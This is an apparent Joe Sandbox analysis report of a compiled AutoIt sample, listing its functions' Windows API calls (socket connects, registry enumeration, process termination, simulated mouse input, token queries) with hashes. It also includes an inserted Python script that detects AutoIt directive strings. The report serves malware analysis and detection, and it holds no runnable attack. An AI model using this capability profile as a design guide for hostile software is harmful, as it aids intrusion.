                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: EnumFreeLibrary$CloseDeleteOpen
                                        • String ID:
                                        • API String ID: 395352322-0
                                        • Opcode ID: 9c9511c08bfb50452a37c4ca9fcdbe6f458cf00bf784d95e2b684fe19062d43c
                                        • Instruction ID: 45aa357b83a715d6d32cd9c322dc28e749abb1d90b2cdcd538e55fcfe9beff40
                                        • Opcode Fuzzy Hash: 9c9511c08bfb50452a37c4ca9fcdbe6f458cf00bf784d95e2b684fe19062d43c
                                        • Instruction Fuzzy Hash: 84310BB1D0111DBFEB159B90DC89AFFB7BCFF09310F000169E501E2591EA749E89BAA0
                                        APIs
                                        • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00F0655B
                                        • GetWindowLongW.USER32(01162A70,000000F0), ref: 00F0658E
                                        • GetWindowLongW.USER32(01162A70,000000F0), ref: 00F065C3
                                        • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00F065F5
                                        • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00F0661F
                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 00F06630
                                        • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00F0664A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: LongWindow$MessageSend
                                        • String ID:
                                        • API String ID: 2178440468-0
                                        • Opcode ID: eb8586da359080f003827d472e1582b681e67dcd8a394e6cf51391daa4eac4b8
                                        • Instruction ID: 291ee436dfbb1d92ffbd39a1f82f5b0090b278853eeef6574321c86a7ad94a66
                                        • Opcode Fuzzy Hash: eb8586da359080f003827d472e1582b681e67dcd8a394e6cf51391daa4eac4b8
                                        • Instruction Fuzzy Hash: 7231F235A04258AFDB208F18DC85F653BE1FB5A724F1901A8F911CB2F5CB62A864FB51
                                        APIs
                                          • Part of subcall function 00EF80A0: inet_addr.WS2_32(00000000), ref: 00EF80CB
                                        • socket.WS2_32(00000002,00000001,00000006), ref: 00EF64D9
                                        • WSAGetLastError.WS2_32(00000000), ref: 00EF64E8
                                        • ioctlsocket.WS2_32(00000000,8004667E,00000000), ref: 00EF6521
                                        • connect.WSOCK32(00000000,?,00000010), ref: 00EF652A
                                        • WSAGetLastError.WS2_32 ref: 00EF6534
                                        • closesocket.WS2_32(00000000), ref: 00EF655D
                                        • ioctlsocket.WS2_32(00000000,8004667E,00000000), ref: 00EF6576
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                        • String ID:
                                        • API String ID: 910771015-0
                                        • Opcode ID: 92f671e990a11902ccd557290bd9a5e581d0ed70e1ed17f91ddc1e762c313365
                                        • Instruction ID: 27f54d17a1f65878590c8c7fcd2d7f763567ea4958696c7a0fd94471e4c1741f
                                        • Opcode Fuzzy Hash: 92f671e990a11902ccd557290bd9a5e581d0ed70e1ed17f91ddc1e762c313365
                                        • Instruction Fuzzy Hash: CC31937160011CAFDB10AF64DC85BBE7BE9FB44714F049069FA09B7291DB74AD08DBA1
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00EDE0FA
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00EDE120
                                        • SysAllocString.OLEAUT32(00000000), ref: 00EDE123
                                        • SysAllocString.OLEAUT32 ref: 00EDE144
                                        • SysFreeString.OLEAUT32 ref: 00EDE14D
                                        • StringFromGUID2.COMBASE(?,?,00000028), ref: 00EDE167
                                        • SysAllocString.OLEAUT32(?), ref: 00EDE175
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                        • String ID:
                                        • API String ID: 3761583154-0
                                        • Opcode ID: 50cb094cd548e1c182ea57cb61f797b6eafc98eff77d7d02eb1d9752ca4e138e
                                        • Instruction ID: 6ef7b96b47ac4add2cd5934d9938395b314f82565df0116398598b3ed85ede47
                                        • Opcode Fuzzy Hash: 50cb094cd548e1c182ea57cb61f797b6eafc98eff77d7d02eb1d9752ca4e138e
                                        • Instruction Fuzzy Hash: 9C213135605208AFDB20AFA8DC88DAB77ECFB09764B108126F915DB760DA709C469B64
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: __wcsnicmp
                                        • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                        • API String ID: 1038674560-2734436370
                                        • Opcode ID: 452611bab9364400f2cc879d0ff771a0034cad58a5ec56f08a03297d7c5b9322
                                        • Instruction ID: 1934c51471c7a3b30b70b7c9737389f7fadf4d09a3147a4e1fd4fb92aa97fc8f
                                        • Opcode Fuzzy Hash: 452611bab9364400f2cc879d0ff771a0034cad58a5ec56f08a03297d7c5b9322
                                        • Instruction Fuzzy Hash: 77216732114150A6D330E634DC12EE7B3D8DF56344F14A037F887BA281EB50EDA3E295
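The entry above is the interpreter comparing script text, with the case-insensitive `__wcsnicmp`, against the AutoIt directives `#OnAutoItStartRegister`, `#notrayicon` and `#requireadmin`; those strings are the static evidence behind the report's "Binary is likely a compiled AutoIt script file" signature. The Python below is an added example, not part of the Joe Sandbox report or its tooling: it scans a file image for the same three directives in both ASCII and UTF-16LE (the interpreter works on wide strings, so an embedded script carries them as UTF-16), ignoring case as the interpreter does, and reports where each was found. The sample bytes are constructed for the example.

```python
import re

# Directives the interpreter in the listing above matches with __wcsnicmp
# (case-insensitive); taken from the report's "String ID" line.
AUTOIT_DIRECTIVES = ("#OnAutoItStartRegister", "#notrayicon", "#requireadmin")


def autoit_directive_hits(blob, markers=AUTOIT_DIRECTIVES):
    """Return (directive, encoding, offset, text_as_written) for each
    occurrence of a directive in blob, in ASCII or UTF-16LE, ignoring case."""
    hits = []
    for marker in markers:
        for enc in ("ascii", "utf-16-le"):
            # re.IGNORECASE on a bytes pattern folds the ASCII letter bytes;
            # the interleaved NULs of UTF-16LE are matched literally.
            pat = re.compile(re.escape(marker.encode(enc)), re.IGNORECASE)
            for m in pat.finditer(blob):
                hits.append((marker, enc, m.start(), m.group().decode(enc)))
    return sorted(hits, key=lambda h: h[2])


def triage(blob):
    """Map each directive found to the encodings it was seen in; an empty
    dict means no AutoIt directive text is present in this image."""
    found = {}
    for marker, enc, _offset, _text in autoit_directive_hits(blob):
        found.setdefault(marker, set()).add(enc)
    return found


# Constructed sample (not from the analysed file): "#NoTrayIcon" as UTF-16LE,
# the way an embedded script carries it, plus an upper-cased ASCII
# "#REQUIREADMIN", separated by filler bytes.
SAMPLE = (b"\x00" * 16 + "#NoTrayIcon".encode("utf-16-le") + b"junk"
          + b"#REQUIREADMIN" + b"\x00" * 8)
```

`triage(open(path, "rb").read())` on a dumped image such as the `.sdmp` files listed in this report returns which directives are present and in which encoding; `#requireadmin` in particular means the compiled script asks for elevation at start, and `#notrayicon` that it hides the AutoIt tray icon, both worth noting in a triage summary.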
                                        APIs
                                          • Part of subcall function 00E81D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00E81D73
                                          • Part of subcall function 00E81D35: GetStockObject.GDI32(00000011), ref: 00E81D87
                                          • Part of subcall function 00E81D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00E81D91
                                        • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00F078A1
                                        • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00F078AE
                                        • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00F078B9
                                        • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00F078C8
                                        • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00F078D4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: MessageSend$CreateObjectStockWindow
                                        • String ID: Msctls_Progress32
                                        • API String ID: 1025951953-3636473452
                                        • Opcode ID: d7e04d207f1ee576a6062b2ab64d7a9fdb19c2fadf6cc073abbf1ed20007e860
                                        • Instruction ID: 0c7da50bf85f63c77fde4e4a4467e01f28b119a6740b8cfc600e7390284b6dd8
                                        • Opcode Fuzzy Hash: d7e04d207f1ee576a6062b2ab64d7a9fdb19c2fadf6cc073abbf1ed20007e860
                                        • Instruction Fuzzy Hash: FE1163B2550219BFEF159F60CC85EE77F5DEF08768F118115FA04A60A0D772AC21EBA4
                                        APIs
                                        • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize), ref: 00EA41E3
                                        • GetProcAddress.KERNEL32(00000000), ref: 00EA41EA
                                        • RtlEncodePointer.NTDLL(00000000), ref: 00EA41F6
                                        • RtlDecodePointer.NTDLL(00000001), ref: 00EA4213
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                        • String ID: RoInitialize$combase.dll
                                        APIs
                                        • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00EA41B8), ref: 00EA42B8
                                        • GetProcAddress.KERNEL32(00000000), ref: 00EA42BF
                                        • RtlEncodePointer.NTDLL(00000000), ref: 00EA42CA
                                        • RtlDecodePointer.NTDLL(00EA41B8), ref: 00EA42E5
                                        Strings
                                        Similarity
                                        • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                        • String ID: RoUninitialize$combase.dll
                                        APIs
                                        Similarity
                                        • API ID: _memmove$__itow__swprintf
                                        • String ID:
                                        APIs
                                          • Part of subcall function 00E87F41: _memmove.LIBCMT ref: 00E87F82
                                          • Part of subcall function 00F010A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F00038,?,?), ref: 00F010BC
                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F00548
                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00F00588
                                        • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00F005AB
                                        • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00F005D4
                                        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00F00617
                                        • RegCloseKey.ADVAPI32(00000000), ref: 00F00624
                                        Similarity
                                        • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                        • String ID:
                                        APIs
                                        • GetMenu.USER32(?), ref: 00F05A82
                                        • GetMenuItemCount.USER32(00000000), ref: 00F05AB9
                                        • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00F05AE1
                                        • GetMenuItemID.USER32(?,?), ref: 00F05B50
                                        • GetSubMenu.USER32(?,?), ref: 00F05B5E
                                        • PostMessageW.USER32(?,00000111,?,00000000), ref: 00F05BAF
                                        Similarity
                                        • API ID: Menu$Item$CountMessagePostString
                                        • String ID:
                                        APIs
                                        • VariantInit.OLEAUT32(?), ref: 00EDF3F7
                                        • VariantClear.OLEAUT32(00000013), ref: 00EDF469
                                        • VariantClear.OLEAUT32(00000000), ref: 00EDF4C4
                                        • _memmove.LIBCMT ref: 00EDF4EE
                                        • VariantClear.OLEAUT32(?), ref: 00EDF53B
                                        • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00EDF569
                                        Similarity
                                        • API ID: Variant$Clear$ChangeInitType_memmove
                                        • String ID:
                                        APIs
                                        • _memset.LIBCMT ref: 00EE2747
                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00EE2792
                                        • IsMenu.USER32(00000000), ref: 00EE27B2
                                        • CreatePopupMenu.USER32 ref: 00EE27E6
                                        • GetMenuItemCount.USER32(000000FF), ref: 00EE2844
                                        • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00EE2875
                                        Similarity
                                        • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                        • String ID:
                                        APIs
                                          • Part of subcall function 00E82612: GetWindowLongW.USER32(?,000000EB), ref: 00E82623
                                        • BeginPaint.USER32(?,?,?,?,?,?), ref: 00E8179A
                                        • GetWindowRect.USER32(?,?), ref: 00E817FE
                                        • ScreenToClient.USER32(?,?), ref: 00E8181B
                                        • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00E8182C
                                        • EndPaint.USER32(?,?), ref: 00E81876
                                        Similarity
                                        • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                        • String ID:
                                        APIs
                                        • ShowWindow.USER32(00F467B0,00000000,01162A70,?,?,00F467B0,?,00F0B862,?,?), ref: 00F0B9CC
                                        • EnableWindow.USER32(00000000,00000000), ref: 00F0B9F0
                                        • ShowWindow.USER32(00F467B0,00000000,01162A70,?,?,00F467B0,?,00F0B862,?,?), ref: 00F0BA50
                                        • ShowWindow.USER32(00000000,00000004,?,00F0B862,?,?), ref: 00F0BA62
                                        • EnableWindow.USER32(00000000,00000001), ref: 00F0BA86
                                        • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00F0BAA9
                                        Similarity
                                        • API ID: Window$Show$Enable$MessageSend
                                        • String ID:
                                        APIs
                                        • GetForegroundWindow.USER32(?,?,?,?,?,?,00EF5134,?,?,00000000,00000001), ref: 00EF73BF
                                          • Part of subcall function 00EF3C94: GetWindowRect.USER32(?,?), ref: 00EF3CA7
                                        • GetDesktopWindow.USER32 ref: 00EF73E9
                                        • GetWindowRect.USER32(00000000), ref: 00EF73F0
                                        • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00EF7422
                                          • Part of subcall function 00EE54E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00EE555E
                                        • GetCursorPos.USER32(?), ref: 00EF744E
                                        • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00EF74AC
                                        Similarity
                                        • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                        • String ID:
                                        APIs
                                          • Part of subcall function 00E89997: __itow.LIBCMT ref: 00E899C2
                                          • Part of subcall function 00E89997: __swprintf.LIBCMT ref: 00E89A0C
                                          • Part of subcall function 00E9FEC6: _wcscpy.LIBCMT ref: 00E9FEE9
                                        • _wcstok.LIBCMT ref: 00EEEEFF
                                        • _wcscpy.LIBCMT ref: 00EEEF8E
                                        • _memset.LIBCMT ref: 00EEEFC1
                                        Strings
                                        Similarity
                                        • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                        • String ID: X
                                        APIs
                                          • Part of subcall function 00ED85F1: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00ED8608
                                          • Part of subcall function 00ED85F1: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00ED8612
                                          • Part of subcall function 00ED85F1: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00ED8621
                                          • Part of subcall function 00ED85F1: RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 00ED8628
                                          • Part of subcall function 00ED85F1: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00ED863E
                                        • GetLengthSid.ADVAPI32(?,00000000,00ED8977), ref: 00ED8DAC
                                        • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00ED8DB8
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00ED8DBF
                                        • CopySid.ADVAPI32(00000000,00000000,?), ref: 00ED8DD8
                                        • GetProcessHeap.KERNEL32(00000000,00000000,00ED8977), ref: 00ED8DEC
                                        • HeapFree.KERNEL32(00000000), ref: 00ED8DF3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Heap$Process$AllocateInformationToken$CopyErrorFreeLastLength
                                        • String ID:
                                        • API String ID: 169236558-0
                                        • Opcode ID: 205748ead31ebe9d9579aa59ba5eec25301e91ed42b7a79930ffd87e0d0e0def
                                        • Instruction ID: ca72b9217ee1cdd1fb8f83c4093a2fd8830bb7e407a5339223b4e9e516a06dab
                                        • Opcode Fuzzy Hash: 205748ead31ebe9d9579aa59ba5eec25301e91ed42b7a79930ffd87e0d0e0def
                                        • Instruction Fuzzy Hash: 3F11DC31500608FFDB209FA4CD08BAE7BBEFF54319F10412AE885A3291CB32A905DB60
                                        APIs
                                          • Part of subcall function 00E812F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00E8134D
                                          • Part of subcall function 00E812F3: SelectObject.GDI32(?,00000000), ref: 00E8135C
                                          • Part of subcall function 00E812F3: BeginPath.GDI32(?), ref: 00E81373
                                          • Part of subcall function 00E812F3: SelectObject.GDI32(?,00000000), ref: 00E8139C
                                        • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00F0C1C4
                                        • LineTo.GDI32(00000000,00000003,?), ref: 00F0C1D8
                                        • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00F0C1E6
                                        • LineTo.GDI32(00000000,00000000,?), ref: 00F0C1F6
                                        • EndPath.GDI32(00000000), ref: 00F0C206
                                        • StrokePath.GDI32(00000000), ref: 00F0C216
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                        • String ID:
                                        • API String ID: 43455801-0
                                        • Opcode ID: 4842024e85c54e6a6426bc48ce1a7651dff871d47c83c25278532fdef16a1b8c
                                        • Instruction ID: 4c4a2550992616aeb1f60c0e9dc231d8b1664d5a5d73b4a9587ab74385075c7e
                                        • Opcode Fuzzy Hash: 4842024e85c54e6a6426bc48ce1a7651dff871d47c83c25278532fdef16a1b8c
                                        • Instruction Fuzzy Hash: 2811097640014CBFDB119F90DC88FAA7FADFF19364F048021BE189A5A1C7719D59EBA0
                                        APIs
                                        • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00EA03D3
                                        • MapVirtualKeyW.USER32(00000010,00000000), ref: 00EA03DB
                                        • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00EA03E6
                                        • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00EA03F1
                                        • MapVirtualKeyW.USER32(00000011,00000000), ref: 00EA03F9
                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00EA0401
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Virtual
                                        • String ID:
                                        • API String ID: 4278518827-0
                                        • Opcode ID: bd5a627f728c07e4537b8d571914230669780029d7ef802dc93fb0d1a2bf35c2
                                        • Instruction ID: 94c2afdbd8c9965763a72eb67f687946f27249bfc0c1f16a8e2ae9908a5ad908
                                        • Opcode Fuzzy Hash: bd5a627f728c07e4537b8d571914230669780029d7ef802dc93fb0d1a2bf35c2
                                        • Instruction Fuzzy Hash: 89016CB09017597DE3008F5A8C85B52FFA8FF19354F00411BA15C47941C7F5A868CBE5
                                        APIs
                                        • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00EE569B
                                        • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00EE56B1
                                        • GetWindowThreadProcessId.USER32(?,?), ref: 00EE56C0
                                        • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00EE56CF
                                        • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00EE56D9
                                        • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00EE56E0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
